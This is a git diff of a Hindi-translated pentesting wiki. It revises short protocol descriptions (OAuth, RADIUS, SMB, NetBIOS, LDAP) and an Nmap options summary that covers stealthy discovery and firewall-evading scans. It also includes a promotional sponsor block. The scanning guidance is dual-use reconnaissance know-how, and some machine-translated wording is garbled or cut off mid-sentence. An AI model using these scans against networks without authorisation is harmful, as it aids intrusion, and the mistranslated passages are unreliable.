प्रक्रिया में उपयोगकर्ता प्रमाणीकरण, उपयोगकर्ता द्वारा अधिकृति, और गूगल द्वारा टोकन उत्पादन शामिल है, जिससे सेवा निर्दिष्ट उपयोगकर्ता डेटा तक पहुंच सकती है। +OAuth 2.0 एक प्रोटोकॉल है जो सुरक्षित, चयनित रूप से उपयोगकर्ता जानकारी का साझा करना सुनिश्चित करता है सेवाओं के बीच। उदाहरण के लिए, यह सेवाओं को बिना कई लॉगिन किए गूगल से उपयोगकर्ता डेटा तक पहुंचने की सुविधा प्रदान करता है। इस प्रक्रिया में उपयोगकर्ता प्रमाणीकरण, उपयोगकर्ता द्वारा अधिकृति, और गूगल द्वारा टोकन उत्पादन शामिल है, जो सेवा को निर्दिष्ट उपयोगकर्ता डेटा तक पहुंचने की अनुमति देता है। ## RADIUS -RADIUS (Remote Authentication Dial-In User Service) एक नेटवर्क पहुंच प्रोटोकॉल है जिसका मुख्य रूप से आईएसपीएस द्वारा उपयोग किया जाता है। यह प्रमाणीकरण, अधिकृति, और लेखा समर्थन का समर्थन करता है। उपयोगकर्ता क्रेडेंशियल RADIUS सर्वर द्वारा सत्यापित किए जाते हैं, जिसमें सुरक्षा जोड़ने के लिए नेटवर्क पते सत्यापित हो सकते हैं। पोस्ट-प्रमाणीकरण, उपयोगकर्ताओं को नेटवर्क पहुंच मिलती है और उनका सत्र विवरण बिलिंग और सांख्यिकीय उद्देश्यों के लिए ट्रैक किए जाते हैं। +RADIUS (Remote Authentication Dial-In User Service) एक नेटवर्क एक्सेस प्रोटोकॉल है जिसे मुख्य रूप से आईएसपी द्वारा उपयोग किया जाता है। यह प्रमाणीकरण, अधिकृति, और लेखा समर्थन का समर्थन करता है। उपयोगकर्ता क्रेडेंशियल RADIUS सर्वर द्वारा सत्यापित किए जाते हैं, जिसमें सुरक्षा जोड़ने के लिए नेटवर्क पते सत्यापित हो सकते हैं। पोस्ट-प्रमाणीकरण, उपयोगकर्ताओं को नेटवर्क पहुंच मिलती है और उनका सत्र विवरण बिलिंग और सांख्यिकीय उद्देश्यों के लिए ट्रैक किए जाते हैं। ## SMB और NetBIOS -### SMB (सर्वर संदेश ब्लॉक) -SMB एक प्रोटोकॉल है जो फ़ाइल, प्रिंटर, और पोर्ट साझा करने के लिए है। यह सीधे TCP (पोर्ट 445) के माध्यम से या NetBIOS के माध्यम से TCP (पोर्ट 137, 138) के माध्यम से संचालित होता है। यह दोहरी संगतता विभिन्न उपकरणों के साथ कनेक्टिविटी को बढ़ाती है। +### SMB (सर्वर मैसेज ब्लॉक) +SMB एक प्रोटोकॉल है जो फ़ाइल, प्रिंटर, और पोर्ट साझा करने के लिए है। यह सीधे TCP (पोर्ट 445) पर या NetBIOS के माध्यम से TCP (पोर्ट 137, 138) के माध्यम से काम करता है। यह दोहरी संगतता विभिन्न उपकरणों के साथ कनेक्टिविटी को बढ़ाती है। ### NetBIOS (नेटवर्क बेसिक इनपुट/आउटपुट सिस्टम) -NetBIOS नेटवर्क सत्र और संसाधन साझा करने के लिए नेटवर्क सत्र और कनेक्शनों का प्रबंधन करता है। यह उपकरणों के लिए अद्वितीय नामों का समर्थन करता है और एकाधिक उपकरणों के लिए समूह नामों का समर्थन करता है, लक्षित या ब्रॉडकास्ट संदेश भेजने की संभावना देता है। संचार संबंधित या सत्र-आधारित हो सकता है। जबकि NetBIOS पारंपरिक रूप से प्रोटोकॉलों जैसे IPC/IPX के माध्यम से संचालित होता है, यह आमतौर पर TCP/IP के माध्यम से उपयोग किया जाता है। NetBEUI, एक संबंधित प्रोटोकॉल, अपनी गति के लिए जाना जाता है, लेकिन ब्रॉडकास्टिंग के कारण भी काफी व्याख्यात्मक था। +NetBIOS नेटवर्क सत्र और संयोजनों का प्रबंधन करता है रिसोर्स साझा करने के लिए। यह उपकरणों के लिए अद्वितीय नामों का समर्थन करता है और एकाधिक उपकरणों के लिए समूह नामों का समर्थन करता है, लक्षित या ब्रॉडकास्ट संदेश भेजने की संभावना देता है। संचार कनेक्शनलेस (कोई स्वीकृति नहीं) या कनेक्शन-विषयक (सत्र-आधारित) हो सकती है। जबकि NetBIOS पारंपरिक रूप से प्रोटोकॉलों के ऊपर ऑपरेट करता है जैसे IPC/IPX, यह आमतौर पर TCP/IP के ऊपर उपयोग किया जाता है। NetBEUI, एक संबंधित प्रोटोकॉल, अपनी गति के लिए जाना जाता है लेकिन ब्रॉडकास्टिंग के कारण भी काफी व्याख्यात्मक था। ## LDAP (लाइटवेट डायरेक्टरी एक्सेस प्रोटोकॉल) -LDAP एक प्रोटोकॉल है जो TCP/IP के माध्यम से निर्देशिका सूचना के प्रबंधन और पहुंच को संभावित बनाता है। यह विभिन्न प्रश्नों का समर्थन करता है जिसके लिए निर्देशिका सूचना का प्रश्न +LDAP एक प्रोटोकॉल है जो TCP/IP के माध्यम से निर्देशिका सूचना का प्रबंधन और पहुंच संभव बनाता है। यह विभिन्न प्रश्नों का समर्थन करता है जिसके लिए निर्देशिका सू diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 3718f5610..70c660c67 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,18 +1,19 @@ # Nmap सारांश (ESP) +{% hint style="success" %} +AWS हैकिंग सीखें और अभ्यास करें:[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP हैकिंग सीखें और अभ्यास करें: [**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)! +हैकट्रिक्स का समर्थन करें -HackTricks का समर्थन करने के अन्य तरीके: - -* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! -* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें -* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें -* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। -* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। +* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें! +* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें। +* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
+{% endhint %}
@@ -24,39 +25,39 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ### स्कैन करने के लिए IPs -* **`,`:** IPs को सीधे इंडिकेट करें +* **`,`:** सीधे IPs को दर्शाता है * **`-iL `:** सूची_IPs -* **`-iR `**: रैंडम IPs की संख्या, आप `--exclude ` या `--excludefile ` के साथ संभावित IPs को बाहर कर सकते हैं। +* **`-iR `**: यादृच्छिक Ips की संख्या, आप `--exclude ` या `--excludefile ` के साथ संभावित Ips को छोड़ सकते हैं। ### उपकरण खोज -निम्नलिखित डिस्कवरी फेज को लॉन्च करता है Nmap: `-PA80 -PS443 -PE -PP` +निम्नलिखित डिस्कवरी चरण को लॉन्च करता है Nmap: `-PA80 -PS443 -PE -PP` -* **`-sL`**: यह अत्यधिक आक्रामक नहीं है, यह लक्ष्यों की सूची बनाता है जिसमें नामों को हल करने के लिए **DNS** अनुरोध किए जाते हैं। यह उपयोगी है यदि आप जानना चाहते हैं कि क्या उदाहरण के लिए www.prueba.es/24 सभी IPs हमारे लक्ष्य हैं। -* **`-Pn`**: **कोई पिंग नहीं**। यह उपयोगी है अगर आप जानते हैं कि सभी वे सक्रिय हैं (अगर नहीं, तो आप बहुत समय खो सकते हैं, लेकिन यह विकल्प भी गलत नकारात्मक परिणाम देता है कि वे सक्रिय नहीं हैं), यह डिस्कवरी फेज को रोकता है। -* **`-sn`** : **कोई पोर्ट स्कैन नहीं**। अनुसंधान फेज पूरा करने के बाद, यह पोर्ट स्कैन नहीं करता है। यह अपेक्षाकृत छिपकली है, और एक छोटे नेटवर्क स्कैन करने की अनुमति देता है। विशेषाधिकारों के साथ, यह 80 को ACK (-PA) भेजता है, 443 को SYN(-PS) भेजता है और एक इको अनुरोध और एक समयचिह्न अनुरोध भेजता है, बिना विशेषाधिकारों के हमेशा कनेक्शन पूरा होता है। यदि लक्ष्य नेटवर्क है, तो केवल ARP(-PR) का उपयोग किया जाता है। यदि दूसरे विकल्प के साथ उपयोग किया जाता है, तो केवल दूसरे विकल्प के पैकेट ड्रॉप किए जाते हैं। +* **`-sL`**: यह आक्रामक नहीं है, यह लक्ष्यों की सूची बनाता है जो नामों को हल करने के लिए **DNS** अनुरोध करते हैं। यह उपयोगी है यदि आप जानना चाहते हैं कि क्या उदाहरण के लिए www.prueba.es/24 सभी Ips हमारे लक्ष्य हैं। +* **`-Pn`**: **कोई पिंग नहीं**। यह उपयोगी है अगर आप जानते हैं कि सभी उनमें सक्रिय हैं (अगर नहीं, तो आप बहुत समय खो सकते हैं, लेकिन यह विकल्प भी गलत नकारात्मक उत्तर देता है कि वे सक्रिय नहीं हैं), यह खोज चरण को रोकता है। +* **`-sn`** : **कोई पोर्ट स्कैन नहीं**। अन्वेषण चरण पूरा करने के बाद, यह पोर्ट स्कैन नहीं करता है। यह अनुमानित रूप से छिपकली, और एक छोटे नेटवर्क स्कैन करने देता है। विशेषाधिकारों के साथ यह 80 को ACK (-PA) भेजता है, 443 को SYN(-PS) भेजता है और एक इको अनुरोध और एक समयचिह्न अनुरोध भेजता है, बिना विशेषाधिकारों के यह हमेशा कनेक्शन पूरा करता है। यदि लक्ष्य नेटवर्क है, तो यह केवल ARP(-PR) का उपयोग करता है। यदि इसे किसी अन्य विकल्प के साथ उपयोग किया जाता है, तो केवल अन्य विकल्प के पैकेट ड्रॉप होते हैं। * **`-PR`**: **पिंग ARP**। यह डिफ़ॉल्ट रूप से हमारे नेटवर्क में कंप्यूटरों का विश्लेषण करते समय उपयोग किया जाता है, यह पिंग का उपयोग करने से तेज है। यदि आप ARP पैकेट का उपयोग नहीं करना चाहते हैं तो `--send-ip` का उपयोग करें। -* **`-PS `**: यह SYN पैकेट भेजता है जिसे यदि यह SYN/ACK के साथ जवाब देता है तो खुला है (जिसे यह RST के साथ जवाब देता है ताकि कनेक्शन समाप्त न हो), यदि यह RST के साथ जवाब देता है तो बंद है और यदि यह जवाब नहीं देता है तो अगम्य है। यदि विशेषाधिकार नहीं हैं, तो सम्पूर्ण कनेक्शन स्वचालित रूप से उपयोग किया जाता है। यदि कोई पोर्ट नहीं दिया गया है, तो यह 80 पर फेंक देता है। +* **`-PS `**: यह SYN पैकेट भेजता है जिसे यदि यह SYN/ACK के साथ जवाब देता है तो खुला है (जिसे यह RST के साथ जवाब देता है ताकि कनेक्शन समाप्त न हो), यदि यह RST के साथ जवाब देता है तो बंद है और यदि यह जवाब नहीं देता है तो अगम्य है। यदि विशेषाधिकार नहीं हैं, तो समूचा कनेक्शन स्वचालित रूप से उपयोग किया जाता है। यदि कोई पोर्ट नहीं दिया गया है, तो यह 80 पर फेंक देता है। * **`-PA `**: पिछले वाले की तरह लेकिन ACK के साथ, दोनों को मिलाकर बेहतर परिणाम मिलते हैं। -* **`-PU `**: उद्देश्य उल्टा है, यह बंद होने की उम्मीद है। कुछ फ़ायरवॉल केवल TCP कनेक्शन की जांच करते हैं। यदि यह बंद है तो यह पोर्ट अप्राप्य है, यदि यह किसी अन्य icmp के साथ जवाब देता है या जवाब नहीं देता है तो यह गंतव्य अप्राप्य छोड़ दिया जाता है। -* **`-PE, -PP, -PM`** : ICMP PINGS: इको प्रतिद्वंद्वी, समयचिह्न और एड्रेसमास्क। यह लॉन्च किया जाता है ताकि पता चले कि लक्ष्य सक्रिय है या नहीं। -* **`-PY`**: 80 के लिए SCTP INIT प्रोब भेजता है, INIT-ACK(खुला) या ABORT(बंद) या कुछ नहीं या ICMP अप्राप्य(निष्क्रिय) जवाब दिया जा सकता है। -* **`-PO `**: हेडर में एक प्रोटोकॉल निर्दिष्ट किया जाता है, डिफ़ॉल्ट रूप से 1(ICMP), 2(IGMP) और 4(Encap IP)। ICMP, IGMP, TCP (6) और UDP (17) प्रोटोकॉल के लिए प्रोटोकॉल हेडर भेजे जाते हैं, बाकी के लिए केवल IP हेडर भेजा जाता है। इसका उद्देश्य है कि हेडर्स की गलत बनावट के कारण प्रोटोकॉल अप्राप्य या उसी प्रोटोकॉल के जवाब दिए जाते हैं ताकि पता चले कि यह ऊपर है या नहीं। +* **`-PU `**: उद्देश्य उल्टा है, जो बंद होने की उम्मीद है। कुछ फ़ायरवॉल केवल TCP कनेक्शन की जांच करते हैं। यदि यह बंद है तो यह पोर्ट अप्राप्त है, यदि यह किसी अन्य icmp के साथ जवाब देता है या जवाब नहीं देता है तो यह गंतव्य अप्राप्त है। +* **`-PE, -PP, -PM`** : ICMP PINGS: इको प्रतिद्वंद्वीकरण, समयचिह्न और एड्रेसमास्क। यह लॉन्च किए जाते हैं ताकि पता चले कि लक्ष्य सक्रिय है या नहीं। +* **`-PY`**: 80 के लिए SCTP INIT प्रोब भेजता है, INIT-ACK(खुला) या ABORT(बंद) या कुछ नहीं या ICMP अप्राप्त(निष्क्रिय) जवाब दिया जा सकता है। +* **`-PO `**: हेडर में एक प्रोटोकॉल दिखाया जाता है, डिफ़ॉल्ट रूप से 1(ICMP), 2(IGMP) और 4(Encap IP)। ICMP, IGMP, TCP (6) और UDP (17) प्रोटोकॉल के लिए प्रोटोकॉल हेडर भेजे जाते हैं, बाकी के लिए केवल IP हेडर भेजा जाता है। इसका उद्देश्य यह है कि हेडर्स के गलत रूपांतरण के कारण प्रोटोकॉल अप्राप्त या उसी प्रोटोकॉल के जवाब दिए जाते हैं ताकि पता चले कि यह ऊपर है या नहीं। * **`-n`**: कोई DNS नहीं * **`-R`**: हमेशा DNS ### पोर्ट स्कैनिंग तकनीकें -* **`-sS`**: कनेक्शन को पूरा नहीं करता है इसलिए कोई पता नहीं छोड़ता, अगर उपयोग किया जा सकता है तो बहुत अच्छा है।(विशेषाधिकार) यह डिफ़ॉल्ट रूप से उपयोग किया जाता है। -* **`-sT`**: कनेक्शन पूरा करता है, इसलिए यह पता छोड़ता है, लेकिन यह सुनिश्चित करने के लिए उपयोग किया जा सकता है। डिफ़ॉल्ट रूप से विशेषाधिकार नहीं है। -* **`-sU`**: धीमा, UDP के लिए। अधिकांश: DNS(53), SNMP(161,162), DHCP(67 और 68), (-sU53,161,162,67,68): खुला(जवाब), बंद(पोर्ट अप्राप्य), फ़िल्टर(अन्य ICMP), खुला/फ़िल्टर(कुछ नहीं)। खुला/फ़िल्टर के मामले में, -sV न्यूनतम संभावनाओं को जानने के लिए कई अनुरोध भेजता है और nmap समर्थित किसी भी संस्करण का पता लगा सकता है और वास्तविक स्थिति का पता लगा सकता है। यह समय को बहुत बढ़ा देता है। +* **`-sS`**: कनेक्शन को पूरा नहीं करता है इसलिए कोई पता नहीं छोड़ता, अगर इस्तेमाल किया जा सकता है तो बहुत अच्छा है।(विशेषाधिकार) यह डिफ़ॉल्ट रूप से उपयोग किया जाता है। +* **`-sT`**: कनेक्शन पूरा करता है, इसलिए यह पता छोड़ता है, लेकिन यह सुनिश्चित करने के लिए उपयोग किया जा सकता है। डिफ़ॉल्ट रूप से विशेषाधिकारों के बिना। +* **`-sU`**: धीमा, UDP के लिए। अधिकांश: DNS(53), SNMP(161,162), DHCP(67 और 68), (-sU53,161,162,67,68): खुला(जवाब), बंद(पोर्ट अप्राप्त), फ़िल्टर(अन्य ICMP), खुला/फ़िल्टर(कुछ नहीं)। खुला/फ़िल्टर के मामले में, -sV न्यूनतम संभावनाओं को खोजने के लिए कई अनुरोध भेजता है और nmap समर्थित किसी भी संस्करण का पता लगा सकता है और वास्तविक स्थिति का पता लगा सकता है। यह समय को बहुत बढ़ा देता है। * **`-sY`**: SCTP प्रोटोकॉल कनेक्शन स्थापित करने में विफल होता है, इसलिए कोई लॉग नहीं होता, -PY की तरह काम करता है -* **`-sN,-sX,-sF`:** नल, फिन, ख्रिसमस, वे कुछ फ़ायरवॉल में प्रवेश कर सकते हैं और जानकारी निकाल सकते हैं। यह उस तथ्य पर आधारित है कि मानक अनुरूप मशीनें उन सभी अनुरोधों के साथ RST देना चाहिए जिनमें SYN, RST या ACK लैग उठाए नहीं हैं: खुला/फ़िल्टर(कुछ नहीं), बंद(RST), फ़िल्टर(अन्य ICMP)। विंडोज, सिस्को, बीएसडीआई और ओएस/400 पर अविश्वसनीय है। यूनिक्स पर हां। -* **`-sM`**: मैमन स्कैन: FIN और ACK फ्लैग भेजता है, वर्तमान में सभी को बंद के रूप में लौटाएगा। -* **`-sA, sW`**: ACK और विंडो, फ़ायरवॉल का पता लगाने के लिए उपयोग किया जाता है, यह जानने के लिए कि पोर्ट फ़िल्टर हैं या नहीं। -sW खुला/बंद के बीच भेद करता है क्योंकि खुले वाले अलग विंडो मान देते हैं: खुला (जवाब विंडो 0 के अलावा), बंद (बंद विंडो = 0), फ़िल्टर (ICMP अप +* **`-sN,-sX,-sF`:** नल, फिन, क्रिसमस, वे कुछ फ़ायरवॉल में प्रवेश कर सकते हैं और जानकारी निकाल सकते हैं। यह उस तथ्य पर आधारित है कि मानक अनुरूप मशीनें उन सभी अनुरोधों के साथ RST के साथ प्रतिक्रिया करना चाहिए जिनमें SYN, RST या ACK लैग उठाए गए हैं: खुला/फ़िल्टर(कुछ नहीं), बंद(RST), फ़िल्टर(अन्य ICMP)। विंडोज, सिस्को, बीएसडीआई और ओएस/400 पर अविश्वसनीय है। यूनिक्स पर हां। +* **`-sM`**: मैमन स्कैन: FIN और ACK लैग भेजता है, बीएसडी के लिए उपयोग किया जाता है, वर्तमान में सभी को बंद ही वापस करेगा। +* **`-sA, sW`**: ACK और विंडो, फ़ायरवॉल का पता लगाने के लिए उपयोग किया जाता है, यह जानने के लिए कि पोर्ट फ़िल्टर हैं या नहीं। -sW खुला/बंद के बीच भेद करता है क्योंकि खुले वाले अलग विंडो मान देते हैं: खुला (जवाब में विंडो 0 के अलावा RST), बंद (RST विंडो = 0), फ़िल्टर (ICMP **--osscan-guess** जब ऑपरेटिंग सिस्टम की पहचान पूरी तरह से सही नहीं होती है तो यह अधिक प्रयास करता है। -**Scripts** +**स्क्रिप्ट्स** \--script _\<नाम>_|_\<श्रेणी>_|_\<निर्देशिका>_|_\<अभिव्यक्ति>_\[,...] @@ -64,21 +65,21 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 उपलब्ध श्रेणियाँ हैं: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, और vuln -* **Auth:** प्रमाणीकरण के लिए उपलब्ध सभी अपने _स्क्रिप्ट_ को चलाता है -* **Default:** उपकरण के डिफ़ॉल्ट बुनियादी _स्क्रिप्ट_ को चलाता है -* **Discovery:** _target_ या पीड़िता से जानकारी प्राप्त करता है -* **External:** बाह्य संसाधनों का उपयोग करने के लिए _स्क्रिप्ट_ -* **Intrusive:** पीड़ित या _target_ के लिए अभिमानी माने जाने वाले _स्क्रिप्ट_ का उपयोग करता है -* **Malware:** क्या खुले हैं कोड या _backdoors_ (पिछले दरवाजे) द्वारा कोई जुड़ाव है या नहीं जांचता है -* **Safe:** अभिमानी नहीं हैं _स्क्रिप्ट_ को चलाता है -* **Vuln:** सबसे अधिक जानी जाने वाली कमियों का पता लगाता है -* **All:** उपलब्ध NSE विस्तार वाले सभी _स्क्रिप्ट_ को चलाता है +* **Auth:** प्रमाणीकरण के लिए उपलब्ध सभी अपने स्क्रिप्ट्स को चलाता है +* **Default:** उपकरण के डिफ़ॉल्ट बुनियादी स्क्रिप्ट्स को चलाता है +* **Discovery:** लक्ष्य या पीड़िता से जानकारी प्राप्त करता है +* **External:** बाहरी संसाधनों का उपयोग करने के लिए स्क्रिप्ट +* **Intrusive:** उस्ताद या लक्ष्य के लिए अभिव्यक्ति माने जाने वाले स्क्रिप्ट्स का उपयोग करता है +* **Malware:** क्या खुले हैं कोड या अवैध द्वार (बैकडोअर्स) द्वारा +* **Safe:** अभिव्यक्ति नहीं करने वाले स्क्रिप्ट्स को चलाता है +* **Vuln:** सबसे ज्यादा जानी जाने वाली वुलनरेबिलिटी का पता लगाता है +* **All:** उपलब्ध NSE विस्तार वाले सभी स्क्रिप्ट्स को चलाता है -स्क्रिप्ट खोजने के लिए: +स्क्रिप्ट्स खोजने के लिए: **nmap --script-help="http-\*" -> जो http- से शुरू होते हैं** -**nmap --script-help="not intrusive" -> उनमें से सभी जो नहीं हैं** +**nmap --script-help="not intrusive" -> उन सभी को छोड़कर** **nmap --script-help="default or safe" -> जो एक में हैं या दूसरे में या दोनों में** @@ -96,37 +97,37 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 \--script-updatedb -**स्क्रिप्ट का उपयोग करने के लिए केवल नाम दर्ज करें: namp --script नाम_देना_है\_स्क्रिप्ट लक्ष्य** --> स्क्रिप्ट और स्कैनर दोनों को चलाने के लिए स्क्रिप्ट दर्ज करने पर, इसलिए स्कैनर के विकल्प भी दर्ज किए जा सकते हैं, हम **“safe=1”** जोड़ सकते हैं ताकि केवल सुरक्षित वाले ही चलें। +**स्क्रिप्ट का उपयोग करने के लिए केवल नाम दर्ज करें: namp --script नाम_दर्ज_करें लक्ष्य** --> स्क्रिप्ट और स्कैनर दोनों को चलाने के लिए स्क्रिप्ट दर्ज करने पर, इसलिए स्कैनर के विकल्प भी जोड़ सकते हैं, हम **“safe=1”** जोड़ सकते हैं ताकि केवल सुरक्षित वाले ही चलें। **समय नियंत्रण** **Nmap सेकंड, मिनट, ms में समय को संशोधित कर सकता है:** --host-timeout arguments 900000ms, 900, 900s, और 15m सभी एक ही चीज करते हैं। -Nmap होस्ट की कुल संख्या को समूहों में विभाजित करता है और उन समूहों का विश्लेषण ब्लॉक में करता है, जिसका मतलब है कि जब तक सभी विश्लेषित नहीं हो जाते हैं, तब तक यह अगले ब्लॉक पर नहीं जाता है (और उपयोगकर्ता को तब तक कोई अद्यतन नहीं मिलता है जब तक ब्लॉक का विश्लेषण नहीं हो जाता है) इस तरह, nmap के लिए बड़े समूहों का उपयोग करना अधिक उपयुक्त है। डिफ़ॉल्ट रूप से कक्षा C में 256 का उपयोग करता है। +Nmap होस्ट की कुल संख्या को समूहों में विभाजित करता है और उन समूहों का विश्लेषण ब्लॉक में करता है, ताकि जब तक सभी विश्लेषित नहीं हो जाते हैं, तब तक अगले ब्लॉक पर नहीं जाता है (और उपयोगकर्ता को भी कोई अद्यतन नहीं मिलता है जब तक ब्लॉक का विश्लेषण नहीं हो जाता है) इस तरह, nmap के लिए बड़े समूहों का उपयोग करना अधिक उपयुक्त है। डिफ़ॉल्ट रूप से कक्षा C में 256 का उपयोग करता है। इसे बदल सकते हैं\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (समानकालिक स्कैन समूह आकारों को समायोजित करें) -समानकालिक स्कैनरों की संख्या को नियंत्रित किया जा सकता है लेकिन यह बेहतर है कि न करें (nmpa में पहले से ही नेटवर्क की स्थिति के आधार पर स्वचालित नियंत्रण शामिल है): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ +समानकालिक स्कैनरों की संख्या को नियंत्रित किया जा सकता है लेकिन यह बेहतर है कि न करें (nmpa में नेटवर्क की स्थिति के आधार पर स्वचालित नियंत्रण शामिल है): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ -हम rtt टाइमआउट को संशोधित कर सकते हैं, लेकिन आम तौर पर यह आवश्यक नहीं होता: **--min-rtt-timeout** _**\